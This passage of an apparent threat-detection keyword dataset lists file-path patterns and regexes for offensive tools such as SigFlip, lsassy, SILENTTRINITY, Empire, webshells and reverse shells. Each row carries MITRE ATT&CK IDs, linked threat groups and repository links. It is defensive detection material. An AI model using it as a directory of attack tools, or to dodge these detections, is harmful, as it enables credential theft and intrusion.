sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/SigFlip/*",".{0,1000}\/SigFlip\/.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/SigLoader.go*",".{0,1000}\/SigLoader\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/SigLoader/*",".{0,1000}\/SigLoader\/.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/SigLoader/*",".{0,1000}\/SigLoader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/signer-exe.py*",".{0,1000}\/signer\-exe\.py.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/SignToolEx.cpp*",".{0,1000}\/SignToolEx\.cpp.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*/SignToolEx.git*",".{0,1000}\/SignToolEx\.git.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for 
code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*/SignToolEx.sln*",".{0,1000}\/SignToolEx\.sln.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*/SilentClean.exe*",".{0,1000}\/SilentClean\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","0","N/A","10","10","175","28","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*/SilentClean/SilentClean/*.cs*",".{0,1000}\/SilentClean\/SilentClean\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for 
CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","175","28","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*/SilentCryptoMiner/*",".{0,1000}\/SilentCryptoMiner\/.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","1","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*/silentdump.c*",".{0,1000}\/silentdump\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/silentdump.h*",".{0,1000}\/silentdump\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" 
"*/SilentHound.git*",".{0,1000}\/SilentHound\.git.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","1","AD Enumeration","7","5","465","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" "*/SilentMoonwalk.git*",".{0,1000}\/SilentMoonwalk\.git.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","7","601","92","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*/silentprocessexit.py*",".{0,1000}\/silentprocessexit\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*/silenttrinity/*.py*",".{0,1000}\/silenttrinity\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in any way.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*/simple_hijacker/*",".{0,1000}\/simple_hijacker\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/simple-backdoor.php*",".{0,1000}\/simple\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","10","1","48","11","2024-03-02T05:51:24Z","2024-02-28T15:12:42Z" "*/SimpleLoader.cpp*",".{0,1000}\/SimpleLoader\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*/SimpleLoader.exe*",".{0,1000}\/SimpleLoader\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 
- T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*/SimpleNTSyscallFuzzer.git*",".{0,1000}\/SimpleNTSyscallFuzzer\.git.{0,1000}","offensive_tool_keyword","SimpleNTSyscallFuzzer","Fuzzer for Windows kernel syscalls.","T1055.011 - T1218","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/waleedassar/SimpleNTSyscallFuzzer","1","1","N/A","7","2","114","22","2024-01-25T02:39:31Z","2022-03-12T10:16:30Z" "*/Simple-Reverse-Shell*",".{0,1000}\/Simple\-Reverse\-Shell.{0,1000}","offensive_tool_keyword","Simple-Reverse-Shell","Simple C++ reverse shell without obfuscation to avoid Win 11 defender detection (At the time of publication","T1548 - T1562 - T1027","TA0003 - TA0008","N/A","N/A","Shell spawning","https://github.com/tihanyin/Simple-Reverse-Shell/","1","1","N/A","N/A","2","116","29","2021-12-21T15:51:48Z","2021-12-19T22:16:32Z" "*/SimplyEmail.git*",".{0,1000}\/SimplyEmail\.git.{0,1000}","offensive_tool_keyword","SimplyEmail","SimplyEmail was built around the concept that tools should do something. and do that something well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. 
Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","932","243","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z" "*/SingleDose.git*",".{0,1000}\/SingleDose\.git.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","1","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*/sip-brute.nse*",".{0,1000}\/sip\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/sip-call-spoof.nse*",".{0,1000}\/sip\-call\-spoof\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/sip-enum-users.nse*",".{0,1000}\/sip\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/sip-methods.nse*",".{0,1000}\/sip\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/sipvicious.py*",".{0,1000}\/sipvicious\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/Sitadel.git*",".{0,1000}\/Sitadel\.git.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","1","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "*/sitadel.log*",".{0,1000}\/sitadel\.log.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" 
"*/sitadel.py*",".{0,1000}\/sitadel\.py.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","1","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "*/sites-available/striker*",".{0,1000}\/sites\-available\/striker.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/sites-enabled/striker*",".{0,1000}\/sites\-enabled\/striker.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/situational_awareness/*.exe",".{0,1000}\/situational_awareness\/.{0,1000}\.exe","offensive_tool_keyword","empire","Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1143","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/situational_awareness/*.ps1",".{0,1000}\/situational_awareness\/.{0,1000}\.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1147","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/skelsec/pypykatz*",".{0,1000}\/skelsec\/pypykatz.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/skelsec/pypykatz","1","1","N/A","10","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*/skypev2-version.nse*",".{0,1000}\/skypev2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Slackor.git*",".{0,1000}\/Slackor\.git.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant 